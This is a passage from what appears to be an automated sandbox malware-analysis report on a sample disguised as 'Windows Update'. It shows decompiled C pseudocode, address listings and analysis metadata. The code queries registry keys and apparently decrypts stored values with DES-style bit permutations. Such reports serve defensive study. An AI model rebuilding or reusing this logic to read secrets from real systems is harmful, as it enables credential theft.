						do {
							_t102 =  *_t226;
							_t226 = _t226 + 1;
						} while (_t102 != 0);
						_t23 = _t226 - _t258 - 1; // 0x22
						_t103 = _t23;
						if(_t103 <= 0) {
							L17:
							_t228 =  &_v268;
							_t27 = _t228 + 1; // 0x1
							_t259 = _t27;
							do {
								_t104 =  *_t228;
								_t228 = _t228 + 1;
							} while (_t104 != 0);
							_t28 = _t228 - _t259 + 1; // 0x2
							_t275 = _t28;
							_t105 = E00077BCE(_t222, _t28, _t28);
							_t287 = _t105;
							if(_t105 != 0) {
								E00077AF9(_t287, _t275,  &_v268);
							}
							_pop(_t276);
							_pop(_t288);
							return E000772F2(_t287, _t222, _v8 ^ _t307, _t259, _t276, _t288);
						} else {
							while( *((char*)(_t307 + _t103 - 0x108)) != 0x5c) {
								_t103 = _t103 - 1;
								if(_t103 > 0) {
									continue;
								} else {
									goto L17;
								}
								goto L60;
							}
							__eflags = _t103 - 0x104;
							if(_t103 >= 0x104) {
								L00077EEC();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t307);
								_t308 = _t312;
								_v856 =  *0x481f80 ^ _t308;
								_push(_t286);
								_push(_t274);
								_v1116 = 0;
								E00077C87( &_v1115, 0, 0x103);
								_t316 = _t312 - 0x814 + 0xc;
								_t277 = 0;
								_t289 = 0;
								__eflags = _v844 - 0xf;
								_t115 =  &_v1372;
								if(_v844 != 0xf) {
									_push(0x471000);
								} else {
									_push(0x470fec);
								}
								E00077AF9();
								_t317 = _t316 + 0xc;
								_t118 =  *0x470200(0, 0x1a, 0, 0,  &_v272, _t115, 0x100);
								__eflags = _t118;
								if(_t118 == 0) {
									E00077AF9( &_v1048, 0x208,  &_v272);
									E00077B4E( &_v1048, 0x208, 0x470790);
									E00077B4E( &_v1048, 0x208,  &_v528);
									E00077B4E( &_v1048, 0x208, 0x471010);
									_v2076 = _t289;
									_t131 = E0007928A( &_v2076,  &_v1048, 0x470890);
									_t318 = _t317 + 0x3c;
									__eflags = _t131;
									if(_t131 != 0) {
										goto L32;
									} else {
										_t134 = _v2076;
										__eflags = _t134;
										if(__eflags == 0) {
											goto L32;
										} else {
											_push(_t134);
											_push(0x400);
											_push( &_v2072);
											_t136 = E00079087(_t222, _t277, _t289, __eflags);
											_t319 = _t318 + 0xc;
											__eflags = _t136;
											if(__eflags == 0) {
												L57:
												_push(_v2076);
												E00079010(_t222, _t277, _t289, __eflags);
												_pop(_t279);
												__eflags = _v12 ^ _t308;
												_pop(_t291);
												return E000772F2(_t277, _t222, _v12 ^ _t308, _t258, _t279, _t291);
											} else {
												do {
													E00078317( &_v2072, 0x400);
													_t321 = _t319 + 8;
													__eflags = _t289;
													if(_t289 != 0) {
														_t143 = E00078487( &_v2072, 0x471030);
														_t322 = _t321 + 8;
														__eflags = _t143;
														if(__eflags != 0) {
															_t145 = E00078487( &_v2072, 0x471038);
															_t323 = _t322 + 8;
															__eflags = _t145;
															if(_t145 != 0) {
																 *_t145 = 0x5c;
															}
															_t236 =  &_v2072;
															_t260 = _t236 + 1;
															do {
																_t146 =  *_t236;
																_t236 = _t236 + 1;
																__eflags = _t146;
															} while (_t146 != 0);
															_t238 = _t236 - _t260 - 1;
															__eflags = _t238 - 0x400;
															if(_t238 >= 0x400) {
																L00077EEC();
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t308);
																_push(_t289);
																_push(_t277);
																_t280 = _v2944;
																_t292 = _t280[1];
																_t261 =  *_t280;
																_t151 = (_t292 >> 0x00000004 ^ _t261) & 0x0f0f0f0f;
																_t262 = _t261 ^ _t151;
																_t293 = _t292 ^ _t151 << 0x00000004;
																_t156 = (_t262 >> 0x00000010 ^ _t293) & 0x0000ffff;
																_t294 = _t293 ^ _t156;
																_t263 = _t262 ^ _t156 << 0x00000010;
																_t161 = (_t294 >> 0x00000002 ^ _t263) & 0x33333333;
																_t264 = _t263 ^ _t161;
																_t295 = _t294 ^ _t161 << 0x00000002;
																_t166 = (_t264 >> 0x00000008 ^ _t295) & 0x00ff00ff;
																_t296 = _t295 ^ _t166;
																_t265 = _t264 ^ _t166 << 0x00000008;
																_t242 = (_t296 >> 0x00000001 ^ _t265) & 0x55555555;
																 *_t280 = _t242 ^ _t265;
																_t280[1] = _t242 + _t242 ^ _t296;
																L0001FFF7(_t280, _v2932, 0);
																L0001FFF7(_t280, _v2936, 1);
																L0001FFF7(_t280, _v2940, 0);
																_t297 = _t280[1];
																_t266 =  *_t280;
																_t178 = (_t297 >> 0x00000001 ^ _t266) & 0x55555555;
																_t267 = _t266 ^ _t178;
																_t298 = _t297 ^ _t178 + _t178;
																_t183 = (_t267 >> 0x00000008 ^ _t298) & 0x00ff00ff;
																_t299 = _t298 ^ _t183;
																_t268 = _t267 ^ _t183 << 0x00000008;
																_t188 = (_t299 >> 0x00000002 ^ _t268) & 0x33333333;
																_t269 = _t268 ^ _t188;
																_t300 = _t299 ^ _t188 << 0x00000002;
																_t193 = (_t269 >> 0x00000010 ^ _t300) & 0x0000ffff;
																_t301 = _t300 ^ _t193;
																_t270 = _t269 ^ _t193 << 0x00000010;
																_t246 = (_t301 >> 0x00000004 ^ _t270) & 0x0f0f0f0f;
																_t196 = _t246 ^ _t270;
																_t248 = _t246 << 0x00000004 ^ _t301;
																__eflags = _t248;
																 *_t280 = _t196;
																_t280[1] = _t248;
																return _t196;
															} else {
																_push(_t222);
																 *((char*)(_t308 + _t238 - 0x810)) = _t146;
																_t198 = E00078487( &_v2072, 0x47103c);
																_t249 =  &_v272;
																_t325 = _t323 + 8;
																_t223 = _t198;
																_t66 = _t249 + 1; // 0x1
																_t271 = _t66;
																do {
																	_t199 =  *_t249;
																	_t249 = _t249 + 1;
																	__eflags = _t199;
																} while (_t199 != 0);
																_t250 = _t249 - _t271;
																__eflags = _t250;
																_t272 =  &_v528;
																_t303 = _t272 + 1;
																do {
																	_t200 =  *_t272;
																	_t272 = _t272 + 1;
																	__eflags = _t200;
																} while (_t200 != 0);
																_t258 = _t272 - _t303;
																__eflags = _t258;
																_t304 = _t223;
																_t69 = _t304 + 1; // 0x1
																_t282 = _t69;
																do {
																	_t201 =  *_t304;
																	_t304 = _t304 + 1;
																	__eflags = _t201;
																} while (_t201 != 0);
																_t70 = _t250 + 3; // 0x4
																_t289 = _t304 - _t282 + _t70 + _t258;
																_t204 = E00077BCE(_t223, _t282, _t304 - _t282 + _t70 + _t258);
																_t277 = _t204;
																_t319 = _t325 + 4;
																__eflags = _t204;
																if(__eflags != 0) {
																	E00077AF9(_t277, _t289,  &_v272);
																	E00077B4E(_t277, _t289, 0x470790);
																	E00077B4E(_t277, _t289,  &_v528);
																	E00077B4E(_t277, _t289, 0x470790);
																	_t73 = _t223 + 1; // 0x1
																	E00077B4E(_t277, _t289, _t73);
																	_t319 = _t319 + 0x3c;
																}
																_pop(_t222);
																goto L57;
															}
														} else {
															goto L41;
														}
													} else {
														_t218 = E00078487( &_v2072, 0x471020);
														_t322 = _t321 + 8;
														__eflags = _t218;
														if(__eflags != 0) {
															_t289 = 1;
														}
														goto L41;
													}
													goto L60;
													L41:
													_push(_v2076);
													_push(0x400);
													_push( &_v2072);
													_t214 = E00079087(_t222, _t277, _t289, __eflags);
													_t319 = _t322 + 0xc;
													__eflags = _t214;
												} while (__eflags != 0);
												_push(_v2076);
												E00079010(_t222, _t277, _t289, __eflags);
												_pop(_t283);
												_pop(_t306);
												__eflags = _v12 ^ _t308;
												return E000772F2(_t277, _t222, _v12 ^ _t308, _t258, _t283, _t306);
											}
										}
									}
								} else {
									 *0x470124();
									L32:
									_pop(_t278);
									_pop(_t290);
									__eflags = _v12 ^ _t308;
									return E000772F2(0, _t222, _v12 ^ _t308, _t258, _t278, _t290);
								}
							} else {
								 *((char*)(_t307 + _t103 - 0x108)) = 0;
								goto L17;
							}
						}
					}
				}
				L60:
			}































































































































                                                                                                                    0x0001f587
                                                                                                                    0x0001f598
                                                                                                                    0x0001f59f
                                                                                                                    0x0001f5a4
                                                                                                                    0x0001f5ab
                                                                                                                    0x0001f5b5
                                                                                                                    0x0001f5bb
                                                                                                                    0x0001f5c4
                                                                                                                    0x0001f5bd
                                                                                                                    0x0001f5bd
                                                                                                                    0x0001f5bd
                                                                                                                    0x0001f5c9
                                                                                                                    0x0001f5ce
                                                                                                                    0x0001f5cf
                                                                                                                    0x0001f5d4
                                                                                                                    0x0001f5dd
                                                                                                                    0x0001f5de
                                                                                                                    0x0001f5e3
                                                                                                                    0x0001f5eb
                                                                                                                    0x0001f5ec
                                                                                                                    0x0001f5f9
                                                                                                                    0x0001f712
                                                                                                                    0x0001f717
                                                                                                                    0x0001f721
                                                                                                                    0x0001f5ff
                                                                                                                    0x0001f61e
                                                                                                                    0x0001f626
                                                                                                                    0x0001f70c
                                                                                                                    0x00000000
                                                                                                                    0x0001f644
                                                                                                                    0x0001f64c
                                                                                                                    0x0001f659
                                                                                                                    0x0001f65b
                                                                                                                    0x0001f661
                                                                                                                    0x0001f661
                                                                                                                    0x0001f667
                                                                                                                    0x0001f667
                                                                                                                    0x0001f669
                                                                                                                    0x0001f66a
                                                                                                                    0x0001f670
                                                                                                                    0x0001f673
                                                                                                                    0x0001f675
                                                                                                                    0x0001f681
                                                                                                                    0x0001f681
                                                                                                                    0x0001f681
                                                                                                                    0x0001f681
                                                                                                                    0x0001f673
                                                                                                                    0x0001f683
                                                                                                                    0x0001f689
                                                                                                                    0x0001f689
                                                                                                                    0x0001f68c
                                                                                                                    0x0001f68c
                                                                                                                    0x0001f68e
                                                                                                                    0x0001f68f
                                                                                                                    0x0001f695
                                                                                                                    0x0001f695
                                                                                                                    0x0001f69a
                                                                                                                    0x0001f6ab
                                                                                                                    0x0001f6ab
                                                                                                                    0x0001f6b1
                                                                                                                    0x0001f6b1
                                                                                                                    0x0001f6b7
                                                                                                                    0x0001f6b7
                                                                                                                    0x0001f6b9
                                                                                                                    0x0001f6ba
                                                                                                                    0x0001f6c0
                                                                                                                    0x0001f6c0
                                                                                                                    0x0001f6c4
                                                                                                                    0x0001f6c9
                                                                                                                    0x0001f6d0
                                                                                                                    0x0001f6db
                                                                                                                    0x0001f6e0
                                                                                                                    0x0001f6e3
                                                                                                                    0x0001f6e6
                                                                                                                    0x0001f6f4
                                                                                                                    0x0001f69c
                                                                                                                    0x0001f69c
                                                                                                                    0x0001f6a6
                                                                                                                    0x0001f6a9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001f6a9
                                                                                                                    0x0001f6f5
                                                                                                                    0x0001f6fa
                                                                                                                    0x0001f722
                                                                                                                    0x0001f727
                                                                                                                    0x0001f728
                                                                                                                    0x0001f729
                                                                                                                    0x0001f72a
                                                                                                                    0x0001f72b
                                                                                                                    0x0001f72c
                                                                                                                    0x0001f72d
                                                                                                                    0x0001f72e
                                                                                                                    0x0001f72f
                                                                                                                    0x0001f730
                                                                                                                    0x0001f731
                                                                                                                    0x0001f732
                                                                                                                    0x0001f733
                                                                                                                    0x0001f734
                                                                                                                    0x0001f735
                                                                                                                    0x0001f736
                                                                                                                    0x0001f737
                                                                                                                    0x0001f738
                                                                                                                    0x0001f747
                                                                                                                    0x0001f74a
                                                                                                                    0x0001f74b
                                                                                                                    0x0001f75a
                                                                                                                    0x0001f761
                                                                                                                    0x0001f766
                                                                                                                    0x0001f769
                                                                                                                    0x0001f76b
                                                                                                                    0x0001f76d
                                                                                                                    0x0001f771
                                                                                                                    0x0001f777
                                                                                                                    0x0001f780
                                                                                                                    0x0001f779
                                                                                                                    0x0001f779
                                                                                                                    0x0001f779
                                                                                                                    0x0001f78b
                                                                                                                    0x0001f790
                                                                                                                    0x0001f7a2
                                                                                                                    0x0001f7a8
                                                                                                                    0x0001f7aa
                                                                                                                    0x0001f7d7
                                                                                                                    0x0001f7ed
                                                                                                                    0x0001f805
                                                                                                                    0x0001f81b
                                                                                                                    0x0001f833
                                                                                                                    0x0001f839
                                                                                                                    0x0001f83e
                                                                                                                    0x0001f841
                                                                                                                    0x0001f843
                                                                                                                    0x00000000
                                                                                                                    0x0001f849
                                                                                                                    0x0001f849
                                                                                                                    0x0001f84f
                                                                                                                    0x0001f851
                                                                                                                    0x00000000
                                                                                                                    0x0001f857
                                                                                                                    0x0001f857
                                                                                                                    0x0001f85e
                                                                                                                    0x0001f863
                                                                                                                    0x0001f864
                                                                                                                    0x0001f869
                                                                                                                    0x0001f86c
                                                                                                                    0x0001f86e
                                                                                                                    0x0001f9e9
                                                                                                                    0x0001f9e9
                                                                                                                    0x0001f9ef
                                                                                                                    0x0001f9fc
                                                                                                                    0x0001f9fd
                                                                                                                    0x0001f9ff
                                                                                                                    0x0001fa08
                                                                                                                    0x0001f877
                                                                                                                    0x0001f877
                                                                                                                    0x0001f883
                                                                                                                    0x0001f888
                                                                                                                    0x0001f891
                                                                                                                    0x0001f893
                                                                                                                    0x0001f8b4
                                                                                                                    0x0001f8b9
                                                                                                                    0x0001f8bc
                                                                                                                    0x0001f8be
                                                                                                                    0x0001f90a
                                                                                                                    0x0001f90f
                                                                                                                    0x0001f912
                                                                                                                    0x0001f914
                                                                                                                    0x0001f916
                                                                                                                    0x0001f916
                                                                                                                    0x0001f919
                                                                                                                    0x0001f91f
                                                                                                                    0x0001f927
                                                                                                                    0x0001f927
                                                                                                                    0x0001f929
                                                                                                                    0x0001f92a
                                                                                                                    0x0001f92a
                                                                                                                    0x0001f930
                                                                                                                    0x0001f931
                                                                                                                    0x0001f937
                                                                                                                    0x0001fa09
                                                                                                                    0x0001fa0e
                                                                                                                    0x0001fa0f
                                                                                                                    0x0001fa10
                                                                                                                    0x0001fa11
                                                                                                                    0x0001fa12
                                                                                                                    0x0001fa13
                                                                                                                    0x0001fa14
                                                                                                                    0x0001fa15
                                                                                                                    0x0001fa16
                                                                                                                    0x0001fa17
                                                                                                                    0x0001fa1a
                                                                                                                    0x0001fa1b
                                                                                                                    0x0001fa1c
                                                                                                                    0x0001fa21
                                                                                                                    0x0001fa24
                                                                                                                    0x0001fa2d
                                                                                                                    0x0001fa32
                                                                                                                    0x0001fa37
                                                                                                                    0x0001fa40
                                                                                                                    0x0001fa45
                                                                                                                    0x0001fa4a
                                                                                                                    0x0001fa53
                                                                                                                    0x0001fa58
                                                                                                                    0x0001fa5d
                                                                                                                    0x0001fa69
                                                                                                                    0x0001fa6e
                                                                                                                    0x0001fa73
                                                                                                                    0x0001fa7b
                                                                                                                    0x0001fa85
                                                                                                                    0x0001fa8d
                                                                                                                    0x0001fa90
                                                                                                                    0x0001fa9b
                                                                                                                    0x0001faa6
                                                                                                                    0x0001faab
                                                                                                                    0x0001faae
                                                                                                                    0x0001fab6
                                                                                                                    0x0001fabb
                                                                                                                    0x0001fabf
                                                                                                                    0x0001fac8
                                                                                                                    0x0001facd
                                                                                                                    0x0001fad2
                                                                                                                    0x0001fadb
                                                                                                                    0x0001fae0
                                                                                                                    0x0001fae5
                                                                                                                    0x0001faf1
                                                                                                                    0x0001faf6
                                                                                                                    0x0001fafb
                                                                                                                    0x0001fb04
                                                                                                                    0x0001fb0c
                                                                                                                    0x0001fb11
                                                                                                                    0x0001fb11
                                                                                                                    0x0001fb13
                                                                                                                    0x0001fb15
                                                                                                                    0x0001fb1b
                                                                                                                    0x0001f93d
                                                                                                                    0x0001f93d
                                                                                                                    0x0001f93e
                                                                                                                    0x0001f951
                                                                                                                    0x0001f956
                                                                                                                    0x0001f95c
                                                                                                                    0x0001f95f
                                                                                                                    0x0001f961
                                                                                                                    0x0001f961
                                                                                                                    0x0001f967
                                                                                                                    0x0001f967
                                                                                                                    0x0001f969
                                                                                                                    0x0001f96a
                                                                                                                    0x0001f96a
                                                                                                                    0x0001f96e
                                                                                                                    0x0001f96e
                                                                                                                    0x0001f970
                                                                                                                    0x0001f976
                                                                                                                    0x0001f979
                                                                                                                    0x0001f979
                                                                                                                    0x0001f97b
                                                                                                                    0x0001f97c
                                                                                                                    0x0001f97c
                                                                                                                    0x0001f980
                                                                                                                    0x0001f980
                                                                                                                    0x0001f982
                                                                                                                    0x0001f984
                                                                                                                    0x0001f984
                                                                                                                    0x0001f987
                                                                                                                    0x0001f987
                                                                                                                    0x0001f989
                                                                                                                    0x0001f98a
                                                                                                                    0x0001f98a
                                                                                                                    0x0001f98e
                                                                                                                    0x0001f995
                                                                                                                    0x0001f998
                                                                                                                    0x0001f99d
                                                                                                                    0x0001f99f
                                                                                                                    0x0001f9a2
                                                                                                                    0x0001f9a4
                                                                                                                    0x0001f9af
                                                                                                                    0x0001f9bb
                                                                                                                    0x0001f9c9
                                                                                                                    0x0001f9d5
                                                                                                                    0x0001f9da
                                                                                                                    0x0001f9e0
                                                                                                                    0x0001f9e5
                                                                                                                    0x0001f9e5
                                                                                                                    0x0001f9e8
                                                                                                                    0x00000000
                                                                                                                    0x0001f9e8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001f895
                                                                                                                    0x0001f89b
                                                                                                                    0x0001f8a0
                                                                                                                    0x0001f8a3
                                                                                                                    0x0001f8a5
                                                                                                                    0x0001f8a7
                                                                                                                    0x0001f8a7
                                                                                                                    0x00000000
                                                                                                                    0x0001f8a5
                                                                                                                    0x00000000
                                                                                                                    0x0001f8c0
                                                                                                                    0x0001f8c0
                                                                                                                    0x0001f8cc
                                                                                                                    0x0001f8d1
                                                                                                                    0x0001f8d2
                                                                                                                    0x0001f8d7
                                                                                                                    0x0001f8da
                                                                                                                    0x0001f8da
                                                                                                                    0x0001f8de
                                                                                                                    0x0001f8e4
                                                                                                                    0x0001f8ee
                                                                                                                    0x0001f8ef
                                                                                                                    0x0001f8f3
                                                                                                                    0x0001f8fd
                                                                                                                    0x0001f8fd
                                                                                                                    0x0001f86e
                                                                                                                    0x0001f851
                                                                                                                    0x0001f7ac
                                                                                                                    0x0001f7ac
                                                                                                                    0x0001f7b2
                                                                                                                    0x0001f7b2
                                                                                                                    0x0001f7b5
                                                                                                                    0x0001f7b9
                                                                                                                    0x0001f7c3
                                                                                                                    0x0001f7c3
                                                                                                                    0x0001f6fc
                                                                                                                    0x0001f6fc
                                                                                                                    0x00000000
                                                                                                                    0x0001f6fc
                                                                                                                    0x0001f6fa
                                                                                                                    0x0001f69a
                                                                                                                    0x0001f626
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc_memset
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 4137368368-2967466578
                                                                                                                    • Opcode ID: ccb84bc1d03478e58a9c485c33e6a5a62e6b55d56d23c6fb50a5dc27b78ba8bb
                                                                                                                    • Instruction ID: 715d31e214bcac0dae0a50de9e9ce010907fe584d7627532cb42e02cb3c6c9b9
                                                                                                                    • Opcode Fuzzy Hash: ccb84bc1d03478e58a9c485c33e6a5a62e6b55d56d23c6fb50a5dc27b78ba8bb
                                                                                                                    • Instruction Fuzzy Hash: 1341D23190821A9BDF61DB24DC55BF977B8AF15308F2440E9E88DA6092DBB19FC9CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A35BC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 39%
                                                                                                                    			E000A35BC() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v24;
				char _v267;
				void _v268;
				char _v284;
				void _v332;
				char _v336;
				char _v340;
				char _v344;
				signed int _v408;
				intOrPtr _v412;
				char _v679;
				char _v680;
				char _v804;
				char _v1040;
				char _v1828;
				signed int _v1832;
				char _v2064;
				signed int _v2248;
				intOrPtr _v2252;
				signed int _v2264;
				char _v3088;
				char _v4112;
				char _v5136;
				char _v10136;
				char _v10140;
				intOrPtr _v10144;
				signed int _v10148;
				char _v10152;
				signed int _v10156;
				char _v12392;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t263;
				intOrPtr _t266;
				void* _t267;
				intOrPtr _t268;
				void* _t269;
				signed int _t281;
				signed int _t294;
				signed int _t297;
				signed int _t299;
				signed int _t306;
				signed int _t308;
				char _t309;
				signed int _t317;
				signed int _t321;
				signed int _t325;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t346;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t367;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t405;
				signed int _t409;
				signed int _t411;
				char _t415;
				signed int _t416;
				signed int _t428;
				signed int _t437;
				signed int _t446;
				intOrPtr* _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t468;
				signed int _t478;
				signed int _t482;
				intOrPtr _t484;
				void* _t486;
				intOrPtr* _t487;
				intOrPtr* _t492;
				intOrPtr* _t494;
				intOrPtr* _t502;
				void* _t504;
				intOrPtr* _t506;
				intOrPtr* _t508;
				intOrPtr* _t510;
				intOrPtr* _t512;
				intOrPtr* _t516;
				intOrPtr* _t528;
				signed int _t529;
				intOrPtr* _t532;
				int _t534;
				void* _t536;
				signed int _t537;
				void* _t538;
				void* _t539;
				void* _t542;
				void* _t543;
				void* _t544;
				void* _t545;
				intOrPtr* _t546;
				void* _t547;
				void* _t551;
				void* _t552;
				void* _t554;
				void* _t556;
				void* _t557;
				intOrPtr* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t565;
				void* _t566;
				void* _t568;
				void* _t570;
				void* _t571;
				signed int _t573;
				signed int _t575;
				signed int _t577;
				void* _t580;
				void* _t581;
				intOrPtr* _t582;
				void* _t584;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				void* _t588;
				signed int _t590;
				void* _t594;
				void* _t595;
				void* _t596;
				void* _t598;
				void* _t599;
				signed int _t600;
				void* _t601;
				void* _t603;

				_v8 =  *0x482960 ^ _t585;
				_t565 = 0x4751b0;
				memcpy( &_v332, 0x4751b0, 0xf << 2);
				_t551 = 0x4751ce;
				asm("movsb");
				_v268 = 0;
				L000FCE0C( &_v267, 0, 0x103);
				_t590 = _t588 + 0x18;
				_push( &_v336);
				_push(0x20019);
				_push(0);
				_push( &_v332);
				_push(0x80000002);
				_v340 = 0x104;
				if( *0x474018() != 0) {
					L22:
					_pop(_t552);
					__eflags = 0;
					_pop(_t566);
					return L000FBE87(0, _t486, _v8 ^ _t585, _t536, _t552, _t566);
				} else {
					_t263 =  *0x474014(_v336, 0, 0,  &_v344,  &_v268,  &_v340);
					if(_t263 != 0 || _v340 <= _t263 || _v268 == _t263) {
						 *0x474010(_v336);
						goto L22;
					} else {
						 *0x474010(_v336);
						if(_v268 == 0x22) {
							_t532 =  &_v268;
							_t18 = _t532 + 1; // 0x23
							_t547 = _t18;
							goto L6;
							L6:
							_t484 =  *_t532;
							_t532 = _t532 + 1;
							if(_t484 != 0) {
								goto L6;
							} else {
								_t534 = _t532 - _t547 - 1;
								if(_t534 > 0) {
									_t565 =  &_v267;
									memcpy( &_v268, _t565, _t534);
									_t590 = _t590 + 0xc;
									_t551 = _t565 + _t534 + _t534;
								}
							}
						}
						_t492 =  &_v268;
						_t22 = _t492 + 1; // 0x23
						_t537 = _t22;
						do {
							_t266 =  *_t492;
							_t492 = _t492 + 1;
						} while (_t266 != 0);
						_t23 = _t492 - _t537 - 1; // 0x22
						_t267 = _t23;
						if(_t267 <= 0) {
							L14:
							_t494 =  &_v268;
							_t27 = _t494 + 1; // 0x1
							_t538 = _t27;
							goto L15;
							L15:
							_t268 =  *_t494;
							_t494 = _t494 + 1;
							if(_t268 != 0) {
								goto L15;
							} else {
								_t28 = _t494 - _t538 + 1; // 0x2
								_t553 = _t28;
								_t269 = L000FCD57(_t486, _t28, _t28);
								_t567 = _t269;
								if(_t269 != 0) {
									E000FC711(_t567, _t553,  &_v268);
								}
								_pop(_t554);
								_pop(_t568);
								return L000FBE87(_t567, _t486, _v8 ^ _t585, _t538, _t554, _t568);
							}
						} else {
							while( *((char*)(_t585 + _t267 - 0x108)) != 0x5c) {
								_t267 = _t267 - 1;
								if(_t267 > 0) {
									continue;
								} else {
									goto L14;
								}
								goto L115;
							}
							__eflags = _t267 - 0x104;
							if(_t267 >= 0x104) {
								L000FCFD2();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t586 = _t590;
								_v408 =  *0x482960 ^ _t586;
								_v680 = 0;
								L000FCE0C( &_v679, 0, 0x103);
								asm("movq xmm0, [0x4751f0]");
								_t594 = _t590 - 0x720 + 0xc;
								_v412 =  *0x4751f8;
								_t569 = 0;
								asm("movq [ebp-0x10], xmm0");
								_t555 = 0;
								_t281 =  *0x47421c(0, 0x1a, 0, 0,  &_v680, _t551, _t565, _t585);
								__eflags = _t281;
								if(_t281 >= 0) {
									E000FC711( &_v804, 0x208,  &_v284);
									E000FC766( &_v804, 0x208, 0x474d84);
									E000FC766( &_v804, 0x208,  &_v24);
									E000FC766( &_v804, 0x208, 0x4751fc);
									_v1832 = 0;
									_t294 = E000FDB99( &_v1832,  &_v804, 0x474658);
									_t595 = _t594 + 0x3c;
									__eflags = _t294;
									if(_t294 != 0) {
										goto L26;
									} else {
										_t297 = _v1832;
										__eflags = _t297;
										if(__eflags == 0) {
											goto L26;
										} else {
											_push(_t297);
											_push(0x400);
											_push( &_v1828);
											_t299 = E000FD996(_t486, 0, 0, __eflags);
											_t596 = _t595 + 0xc;
											__eflags = _t299;
											if(__eflags == 0) {
												L51:
												_push(_v1832);
												E000FD91F(_t486, _t555, _t569, __eflags);
												_pop(_t557);
												__eflags = _v12 ^ _t586;
												_pop(_t571);
												return L000FBE87(_t555, _t486, _v12 ^ _t586, _t537, _t557, _t571);
											} else {
												do {
													E000FCA6C( &_v1828, 0x400);
													_t598 = _t596 + 8;
													__eflags = _t569;
													if(_t569 != 0) {
														_t306 = E000FCABC( &_v1828, 0x47521c);
														_t599 = _t598 + 8;
														__eflags = _t306;
														if(__eflags != 0) {
															_t308 = E000FCABC( &_v1828, 0x475224);
															_t600 = _t599 + 8;
															__eflags = _t308;
															if(_t308 != 0) {
																 *_t308 = 0x5c;
															}
															_t502 =  &_v1828;
															_t539 = _t502 + 1;
															do {
																_t309 =  *_t502;
																_t502 = _t502 + 1;
																__eflags = _t309;
															} while (_t309 != 0);
															_t504 = _t502 - _t539 - 1;
															__eflags = _t504 - 0x400;
															if(_t504 >= 0x400) {
																L000FCFD2();
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_t587 = _t600;
																L000FBE9C(0x27a0);
																_v2264 =  *0x482960 ^ _t587;
																__eflags = _v2248;
																_t316 =  !=  ? 0x20119 : 0x20019;
																_t317 =  *0x474018(0x80000001, _v2252, 0,  !=  ? 0x20119 : 0x20019,  &_v12392, _t586);
																__eflags = _t317;
																if(_t317 == 0) {
																	_t558 =  *0x474014;
																	_v10140 = 0x400;
																	_v4112 = 0;
																	_t321 =  *_t558(_v10144, 0x4754b8, 0,  &_v10152,  &_v4112,  &_v10140, _t555);
																	__eflags = _t321;
																	if(_t321 != 0) {
																		_v10140 = 0x400;
																		 *_t558(_v10144, 0x4754cc, 0,  &_v10152,  &_v4112,  &_v10140);
																	}
																	_v10140 = 0x400;
																	_t325 =  *_t558(_v10144, 0x4754dc, 0,  &_v10152,  &_v3088,  &_v10140, _t569);
																	_t572 = _t325;
																	_v10148 = 0x1388;
																	_t329 =  *_t558(_v10144, 0x4754ec, 0,  &_v10152,  &_v10136,  &_v10148);
																	__eflags = _t325;
																	if(_t325 == 0) {
																		L59:
																		_t506 =  &_v3088;
																		_t542 = _t506 + 1;
																		do {
																			_t330 =  *_t506;
																			_t506 = _t506 + 1;
																			__eflags = _t330;
																		} while (_t330 != 0);
																		_t331 = _v10148;
																		__eflags = _t506 != _t542;
																		if(_t506 != _t542) {
																			L63:
																			_v2064 = 0;
																			__eflags = _t331;
																			if(_t331 != 0) {
																				E000A4CDC(_t486, _t558, _t572,  &_v10136, _t331,  &_v2064, 0x400, 0);
																				_t600 = _t600 + 0x14;
																			}
																			_v10140 = 0x400;
																			_v1040 = 0;
																			_t573 =  *_t558(_v10144, 0x475324, 0,  &_v10152,  &_v1040,  &_v10140);
																			_v10148 = 4;
																			_v10156 = 0;
																			 *_t558(_v10144, 0x475330, 0,  &_v10152,  &_v10156,  &_v10148);
																			__eflags = _t573;
																			if(_t573 == 0) {
																				__eflags = _v10140 - _t573;
																				if(_v10140 > _t573) {
																					_t446 = _v10156;
																					__eflags = _t446;
																					if(_t446 != 0) {
																						E000FE864(_t446,  &_v5136, 0x400, 0xa);
